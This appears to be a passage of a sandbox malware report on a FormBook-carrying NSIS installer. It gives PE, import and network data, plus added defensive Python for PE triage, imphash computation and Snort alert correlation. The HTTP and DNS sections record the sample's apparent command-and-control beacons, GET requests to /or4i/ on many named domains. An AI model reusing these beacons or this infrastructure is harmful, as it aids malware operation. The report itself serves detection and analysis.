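            findings.append(f"{name}: raw size 0, virtual size {vsize:#x} (uninitialised, nothing on disk)")
    return findings


# Values taken from the report's Static PE Info, Data Directories and Sections
# tables. The characteristics are the bit masks of the flag names listed there.
IMAGE_BASE = 0x400000
FILE_CHARACTERISTICS = 0x010F  # RELOCS_STRIPPED|EXECUTABLE_IMAGE|LINE_NUMS_STRIPPED|LOCAL_SYMS_STRIPPED|32BIT_MACHINE
DLL_CHARACTERISTICS = 0x8540   # DYNAMIC_BASE|NX_COMPAT|NO_SEH|TERMINAL_SERVER_AWARE
DIRECTORIES = [  # (name, virtual address, size); BASERELOC kept although empty, other empty entries omitted
    ("IMPORT", 0x8544, 0xa0),
    ("RESOURCE", 0x38000, 0x33b28),
    ("BASERELOC", 0x0, 0x0),
    ("IAT", 0x8000, 0x29c),
]
SECTIONS = [     # (name, virtual address, virtual size, raw size)
    (".text", 0x1000, 0x6457, 0x6600),
    (".rdata", 0x8000, 0x1380, 0x1400),
    (".data", 0xa000, 0x25538, 0x600),
    (".ndata", 0x30000, 0x8000, 0x0),
    (".rsrc", 0x38000, 0x33b28, 0x33c00),
]

if __name__ == "__main__":
    for line in triage(IMAGE_BASE, FILE_CHARACTERISTICS, DLL_CHARACTERISTICS, DIRECTORIES, SECTIONS):
        print(line)
```

On the report's values this yields exactly two findings: the ineffective ASLR and the disk-less .ndata section; every non-empty directory resolves to the section the table shows.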

                                                                                  Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x38310 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | English | United States
RT_ICON | 0x48b38 | 0xba0d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x54548 | 0x94a8 | data | English | United States
RT_ICON | 0x5d9f0 | 0x5488 | data | English | United States
RT_ICON | 0x62e78 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x670a0 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x69648 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x6a6f0 | 0x988 | data | English | United States
RT_ICON | 0x6b078 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_DIALOG | 0x6b4e0 | 0x100 | data | English | United States
RT_DIALOG | 0x6b5e0 | 0x11c | data | English | United States
RT_DIALOG | 0x6b700 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x6b760 | 0x84 | data | English | United States
RT_MANIFEST | 0x6b7e8 | 0x340 | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                                                                  Imports

DLL | Import
ADVAPI32.dll | RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll | SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll | IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv
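The Import Hash listed under Static PE Info is the imphash: an MD5 over the lower-cased "module.function" import entries taken in import-table order. It ignores addresses and strings, so it survives rebuilding the same source with the same linker settings; here it hashes the imports of the Nullsoft stub, not of the FormBook payload that stub unpacks, so it groups this file with other NSIS installers rather than with the final malware. The following added example (not from the report or from pefile) reimplements the string construction and the hash. It omits pefile's ordinal-to-name lookup tables (used for imports by ordinal from modules such as ws2_32.dll and oleaut32.dll), so for binaries that import by ordinal from those modules its result differs from pefile's. The sample import list is a constructed subset of the table above, and the USER32 ordinal entry in it is invented.

```python
import hashlib

# Module-name extensions that pefile strips before hashing (as in pefile's get_imphash).
_STRIPPED_EXTENSIONS = ("ocx", "sys", "dll")


def _module_name(dll: str) -> str:
    """'KERNEL32.dll' -> 'kernel32'; 'foo.drv' keeps its extension."""
    name = dll.lower()
    stem, _, ext = name.rpartition(".")
    return stem if stem and ext in _STRIPPED_EXTENSIONS else name


def imphash_string(imports):
    """Build the string that gets hashed: 'module.function' entries in
    import-table order, lower-cased, joined by commas. `imports` is
    [(dll, [entries...])]; an entry is a function name or, for an import by
    ordinal, an int (rendered as 'ordN' since no lookup tables are bundled)."""
    parts = []
    for dll, entries in imports:
        module = _module_name(dll)
        for entry in entries:
            func = f"ord{entry}" if isinstance(entry, int) else entry.lower()
            parts.append(f"{module}.{func}")
    return ",".join(parts)


def imphash(imports) -> str:
    """MD5 of imphash_string(); order-sensitive, so the same imports listed in
    a different order hash differently."""
    return hashlib.md5(imphash_string(imports).encode("ascii")).hexdigest()


# Constructed sample: a subset of the report's import table in its listed order,
# plus an invented import by ordinal to exercise that path.
SAMPLE_IMPORTS = [
    ("ADVAPI32.dll", ["RegCreateKeyExA", "AdjustTokenPrivileges", "OpenProcessToken"]),
    ("SHELL32.dll", ["ShellExecuteExA", "SHGetSpecialFolderLocation"]),
    ("USER32.dll", ["SetClipboardData", "ExitWindowsEx", 2000]),
    ("KERNEL32.dll", ["CreateProcessA", "GetProcAddress", "LoadLibraryExA"]),
]

if __name__ == "__main__":
    print(imphash_string(SAMPLE_IMPORTS))
    print(imphash(SAMPLE_IMPORTS))
```

To reproduce the report's value you need the complete table in true import-directory order; a display that sorts or groups entries differently produces a different hash even though the imports are identical.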

                                                                                  Possible Origin

Language of compilation system | Country where language is spoken
English | United States

                                                                                  Network Behavior

                                                                                  Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/12/21-20:03:21.436414 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49752 | 34.102.136.180 | 192.168.2.4
05/12/21-20:03:32.193681 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49763 | 34.102.136.180 | 192.168.2.4
05/12/21-20:03:48.182682 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49766 | 34.102.136.180 | 192.168.2.4
05/12/21-20:04:04.026160 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49768 | 23.227.38.74 | 192.168.2.4
05/12/21-20:04:09.293071 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49771 | 34.102.136.180 | 192.168.2.4
05/12/21-20:04:31.157010 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49775 | 34.102.136.180 | 192.168.2.4
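All six Snort hits are the same signature (SID 1201, an HTTP 403 Forbidden response), but they come from two different servers to the same client inside 70 seconds, and the TCP trace shows further HTTP exchanges with other hosts in the same minute. A client that is told "Forbidden" by several unrelated web servers in quick succession is a signal in its own right, independent of which payload is asking. The following added example (not part of the report) parses alert records in the column order of the table above and applies that rule. The whitespace-separated input format, the 120-second window and the two-server minimum are assumptions; the sample records are the report's own six alerts.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One alert per line, whitespace-separated, in the column order of the report's
# Snort table: timestamp, protocol, SID, message, src port, dst port, src IP, dst IP.
ALERT_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+(?P<proto>\S+)\s+(?P<sid>\d+)\s+"
    r"(?P<msg>.+?)\s+(?P<sport>\d+)\s+(?P<dport>\d+)\s+(?P<src>[\d.]+)\s+(?P<dst>[\d.]+)$"
)


def parse_alert(line: str) -> dict:
    """Split one alert record into typed fields; the lazy message group lets the
    trailing numeric/IP columns anchor the parse even though messages contain spaces."""
    m = ALERT_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable alert line: {line!r}")
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%m/%d/%y-%H:%M:%S.%f")
    d["sid"], d["sport"], d["dport"] = int(d["sid"]), int(d["sport"]), int(d["dport"])
    return d


def alerts_from_text(text: str):
    return [parse_alert(line) for line in text.splitlines() if line.strip()]


def multi_server_403(alerts, window_s=120, min_servers=2):
    """Flag a client that receives 403 responses from at least `min_servers`
    distinct servers inside any `window_s`-second window. For a 403 response
    alert the server is the source and the client is the destination."""
    by_client = defaultdict(list)
    for a in alerts:
        if "403 Forbidden" in a["msg"]:
            by_client[a["dst"]].append((a["ts"], a["src"]))
    hits = []
    for client, events in by_client.items():
        events.sort()
        for i, (t0, _) in enumerate(events):          # slide the window start over each event
            servers = {srv for t, srv in events[i:] if t - t0 <= timedelta(seconds=window_s)}
            if len(servers) >= min_servers:
                hits.append({"client": client, "servers": sorted(servers), "first_seen": t0})
                break                                   # one hit per client is enough
    return hits


# The report's six alerts, re-typed as whitespace-separated records.
SNORT_LINES = """\
05/12/21-20:03:21.436414 TCP 1201 ATTACK-RESPONSES 403 Forbidden 80 49752 34.102.136.180 192.168.2.4
05/12/21-20:03:32.193681 TCP 1201 ATTACK-RESPONSES 403 Forbidden 80 49763 34.102.136.180 192.168.2.4
05/12/21-20:03:48.182682 TCP 1201 ATTACK-RESPONSES 403 Forbidden 80 49766 34.102.136.180 192.168.2.4
05/12/21-20:04:04.026160 TCP 1201 ATTACK-RESPONSES 403 Forbidden 80 49768 23.227.38.74 192.168.2.4
05/12/21-20:04:09.293071 TCP 1201 ATTACK-RESPONSES 403 Forbidden 80 49771 34.102.136.180 192.168.2.4
05/12/21-20:04:31.157010 TCP 1201 ATTACK-RESPONSES 403 Forbidden 80 49775 34.102.136.180 192.168.2.4
"""

if __name__ == "__main__":
    for hit in multi_server_403(alerts_from_text(SNORT_LINES)):
        print(hit["client"], "got 403 from", hit["servers"], "starting", hit["first_seen"])
```

With the defaults the rule fires once, for 192.168.2.4 against 23.227.38.74 and 34.102.136.180; raising min_servers or shrinking the window to a few seconds makes it go quiet, which is the tuning knob between a sandbox-style trace and a busy production network.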

                                                                                  Network Port Distribution

                                                                                  TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 12, 2021 20:03:15.571806908 CEST | 49744 | 80 | 192.168.2.4 | 44.227.76.166
May 12, 2021 20:03:15.774904966 CEST | 80 | 49744 | 44.227.76.166 | 192.168.2.4
May 12, 2021 20:03:15.777678967 CEST | 49744 | 80 | 192.168.2.4 | 44.227.76.166
May 12, 2021 20:03:15.981957912 CEST | 80 | 49744 | 44.227.76.166 | 192.168.2.4
May 12, 2021 20:03:15.982130051 CEST | 49744 | 80 | 192.168.2.4 | 44.227.76.166
May 12, 2021 20:03:16.184225082 CEST | 80 | 49744 | 44.227.76.166 | 192.168.2.4
May 12, 2021 20:03:16.190001965 CEST | 80 | 49744 | 44.227.76.166 | 192.168.2.4
May 12, 2021 20:03:16.190017939 CEST | 80 | 49744 | 44.227.76.166 | 192.168.2.4
May 12, 2021 20:03:16.190237999 CEST | 49744 | 80 | 192.168.2.4 | 44.227.76.166
May 12, 2021 20:03:16.190298080 CEST | 49744 | 80 | 192.168.2.4 | 44.227.76.166
May 12, 2021 20:03:16.392328024 CEST | 80 | 49744 | 44.227.76.166 | 192.168.2.4
May 12, 2021 20:03:21.257399082 CEST | 49752 | 80 | 192.168.2.4 | 34.102.136.180
May 12, 2021 20:03:21.298505068 CEST | 80 | 49752 | 34.102.136.180 | 192.168.2.4
May 12, 2021 20:03:21.298692942 CEST | 49752 | 80 | 192.168.2.4 | 34.102.136.180
May 12, 2021 20:03:21.298877954 CEST | 49752 | 80 | 192.168.2.4 | 34.102.136.180
May 12, 2021 20:03:21.339843988 CEST | 80 | 49752 | 34.102.136.180 | 192.168.2.4
May 12, 2021 20:03:21.436414003 CEST | 80 | 49752 | 34.102.136.180 | 192.168.2.4
May 12, 2021 20:03:21.436446905 CEST | 80 | 49752 | 34.102.136.180 | 192.168.2.4
May 12, 2021 20:03:21.436570883 CEST | 49752 | 80 | 192.168.2.4 | 34.102.136.180
May 12, 2021 20:03:21.436635971 CEST | 49752 | 80 | 192.168.2.4 | 34.102.136.180
May 12, 2021 20:03:21.477725983 CEST | 80 | 49752 | 34.102.136.180 | 192.168.2.4
May 12, 2021 20:03:26.511318922 CEST | 49757 | 80 | 192.168.2.4 | 198.54.114.164
May 12, 2021 20:03:26.704844952 CEST | 80 | 49757 | 198.54.114.164 | 192.168.2.4
May 12, 2021 20:03:26.704986095 CEST | 49757 | 80 | 192.168.2.4 | 198.54.114.164
May 12, 2021 20:03:26.705135107 CEST | 49757 | 80 | 192.168.2.4 | 198.54.114.164
May 12, 2021 20:03:26.905880928 CEST | 80 | 49757 | 198.54.114.164 | 192.168.2.4
May 12, 2021 20:03:26.905924082 CEST | 80 | 49757 | 198.54.114.164 | 192.168.2.4
May 12, 2021 20:03:26.905945063 CEST | 80 | 49757 | 198.54.114.164 | 192.168.2.4
May 12, 2021 20:03:26.905966997 CEST | 80 | 49757 | 198.54.114.164 | 192.168.2.4
May 12, 2021 20:03:26.905987978 CEST | 80 | 49757 | 198.54.114.164 | 192.168.2.4
                                                                                  May 12, 2021 20:03:26.906013012 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.906034946 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.906050920 CEST4975780192.168.2.4198.54.114.164
                                                                                  May 12, 2021 20:03:26.906058073 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.906074047 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.906171083 CEST4975780192.168.2.4198.54.114.164
                                                                                  May 12, 2021 20:03:26.906203985 CEST4975780192.168.2.4198.54.114.164
                                                                                  May 12, 2021 20:03:26.906291008 CEST4975780192.168.2.4198.54.114.164
                                                                                  May 12, 2021 20:03:27.099024057 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:32.014677048 CEST4976380192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:32.055665970 CEST804976334.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:32.055772066 CEST4976380192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:32.055988073 CEST4976380192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:32.098042965 CEST804976334.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:32.193681002 CEST804976334.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:32.193705082 CEST804976334.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:32.193893909 CEST4976380192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:32.193919897 CEST4976380192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:32.236896038 CEST804976334.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:37.295784950 CEST4976480192.168.2.4185.4.135.136
                                                                                  May 12, 2021 20:03:37.372031927 CEST8049764185.4.135.136192.168.2.4
                                                                                  May 12, 2021 20:03:37.372140884 CEST4976480192.168.2.4185.4.135.136
                                                                                  May 12, 2021 20:03:37.372333050 CEST4976480192.168.2.4185.4.135.136
                                                                                  May 12, 2021 20:03:37.449304104 CEST8049764185.4.135.136192.168.2.4
                                                                                  May 12, 2021 20:03:37.449553967 CEST8049764185.4.135.136192.168.2.4
                                                                                  May 12, 2021 20:03:37.449605942 CEST8049764185.4.135.136192.168.2.4
                                                                                  May 12, 2021 20:03:37.449742079 CEST4976480192.168.2.4185.4.135.136
                                                                                  May 12, 2021 20:03:37.449825048 CEST4976480192.168.2.4185.4.135.136
                                                                                  May 12, 2021 20:03:37.526467085 CEST8049764185.4.135.136192.168.2.4
                                                                                  May 12, 2021 20:03:42.629906893 CEST4976580192.168.2.43.16.197.4
                                                                                  May 12, 2021 20:03:42.767245054 CEST80497653.16.197.4192.168.2.4
                                                                                  May 12, 2021 20:03:42.767443895 CEST4976580192.168.2.43.16.197.4
                                                                                  May 12, 2021 20:03:42.767637014 CEST4976580192.168.2.43.16.197.4
                                                                                  May 12, 2021 20:03:42.905056000 CEST80497653.16.197.4192.168.2.4
                                                                                  May 12, 2021 20:03:42.905261993 CEST80497653.16.197.4192.168.2.4
                                                                                  May 12, 2021 20:03:42.905289888 CEST80497653.16.197.4192.168.2.4
                                                                                  May 12, 2021 20:03:42.905524969 CEST4976580192.168.2.43.16.197.4
                                                                                  May 12, 2021 20:03:42.905595064 CEST4976580192.168.2.43.16.197.4
                                                                                  May 12, 2021 20:03:43.044230938 CEST80497653.16.197.4192.168.2.4
                                                                                  May 12, 2021 20:03:48.001588106 CEST4976680192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:48.045504093 CEST804976634.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:48.045645952 CEST4976680192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:48.045959949 CEST4976680192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:48.089550972 CEST804976634.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:48.182682037 CEST804976634.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:48.182719946 CEST804976634.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:48.183000088 CEST4976680192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:48.183528900 CEST4976680192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:48.225518942 CEST804976634.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:53.348578930 CEST4976780192.168.2.4209.222.96.146
                                                                                  May 12, 2021 20:03:53.476600885 CEST8049767209.222.96.146192.168.2.4
                                                                                  May 12, 2021 20:03:53.476844072 CEST4976780192.168.2.4209.222.96.146
                                                                                  May 12, 2021 20:03:53.476977110 CEST4976780192.168.2.4209.222.96.146
                                                                                  May 12, 2021 20:03:53.607042074 CEST8049767209.222.96.146192.168.2.4
                                                                                  May 12, 2021 20:03:53.613686085 CEST8049767209.222.96.146192.168.2.4
                                                                                  May 12, 2021 20:03:53.613758087 CEST8049767209.222.96.146192.168.2.4
                                                                                  May 12, 2021 20:03:53.613966942 CEST4976780192.168.2.4209.222.96.146
                                                                                  May 12, 2021 20:03:53.614051104 CEST4976780192.168.2.4209.222.96.146
                                                                                  May 12, 2021 20:03:53.742172956 CEST8049767209.222.96.146192.168.2.4
                                                                                  May 12, 2021 20:04:03.739383936 CEST4976880192.168.2.423.227.38.74
                                                                                  May 12, 2021 20:04:03.782073975 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:03.782262087 CEST4976880192.168.2.423.227.38.74
                                                                                  May 12, 2021 20:04:03.782355070 CEST4976880192.168.2.423.227.38.74
                                                                                  May 12, 2021 20:04:03.823199034 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:04.026160002 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:04.026191950 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:04.026207924 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:04.026223898 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:04.026237011 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:04.026252985 CEST804976823.227.38.74192.168.2.4

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                                  May 12, 2021 20:03:47.999537945 CEST8.8.8.8192.168.2.40xce09No error (0)rainboxs.com34.102.136.180A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:53.347131014 CEST8.8.8.8192.168.2.40x776cNo error (0)www.nobleandmarble.comnobleandmarble.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:03:53.347131014 CEST8.8.8.8192.168.2.40x776cNo error (0)nobleandmarble.com209.222.96.146A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:03.738435030 CEST8.8.8.8192.168.2.40x987eNo error (0)www.safegrinder.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:04:03.738435030 CEST8.8.8.8192.168.2.40x987eNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:09.111213923 CEST8.8.8.8192.168.2.40x5430No error (0)www.tecquestrian.comtecquestrian.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:04:09.111213923 CEST8.8.8.8192.168.2.40x5430No error (0)tecquestrian.com34.102.136.180A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:14.373636007 CEST8.8.8.8192.168.2.40x8005No error (0)www.booweats.com64.190.62.111A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:19.890546083 CEST8.8.8.8192.168.2.40x20bfNo error (0)www.cuntrera.com154.93.81.33A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:25.639183998 CEST8.8.8.8192.168.2.40x111dNo error (0)www.blissfulyogamullicahill.com199.59.242.153A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:30.975553036 CEST8.8.8.8192.168.2.40x8610No error (0)www.changethecompany.netchangethecompany.netCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:04:30.975553036 CEST8.8.8.8192.168.2.40x8610No error (0)changethecompany.net34.102.136.180A (IP address)IN (0x0001)

HTTP Request Dependency Graph

• www.healshameyoga.com
• www.rogersbeefarm.com
• www.nowhealthdays.com
• www.ikeberto.com
• www.directflence.com
• www.mmgenius.com
• www.rainboxs.com
• www.nobleandmarble.com
• www.safegrinder.com
• www.tecquestrian.com
• www.booweats.com
• www.cuntrera.com
• www.changethecompany.net

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49744 | 44.227.76.166 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 20:03:15.982130051 CEST | 1284 | OUT | GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=br7cblkv9ontd/SiGgT+XZDl5pRbJS2ewUI6yLIzIbkbVffvtcdgNY0Hgbt3ntXhEXSG HTTP/1.1
Host: www.healshameyoga.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 20:03:16.190001965 CEST | 1285 | IN | HTTP/1.1 307 Temporary Redirect
Server: openresty
Date: Wed, 12 May 2021 18:03:16 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 168
Connection: close
Location: http://healshameyoga.com
X-Frame-Options: sameorigin
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49752 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 20:03:21.298877954 CEST | 1643 | OUT | GET /or4i/?HFQDEL_8=iur2w+iIhsR226mwIbytM77gwZtRr9g6xSmsh16YEl1oNNyvhmb6qr2bTjtOXqdr6kbB&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
Host: www.rogersbeefarm.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 20:03:21.436414003 CEST | 1673 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 12 May 2021 18:03:21 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6096ba97-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.4 | 49772 | 64.190.62.111 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 20:04:14.421730995 CEST | 6051 | OUT | GET /or4i/?HFQDEL_8=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QI8r/8KBX8&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
Host: www.booweats.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 20:04:14.499639034 CEST | 6052 | IN | HTTP/1.1 302 Found
date: Wed, 12 May 2021 18:04:14 GMT
content-type: text/html; charset=UTF-8
content-length: 0
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_GR7H1xMTDQhvKsk9JLsRBf15xjVzhUxhlhUt6qvgKB5IoHIpJ3jjYusyTMFbvzyGzakXql8yj22nmafDt8NgEQ==
expires: Mon, 26 Jul 1997 05:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
last-modified: Wed, 12 May 2021 18:04:14 GMT
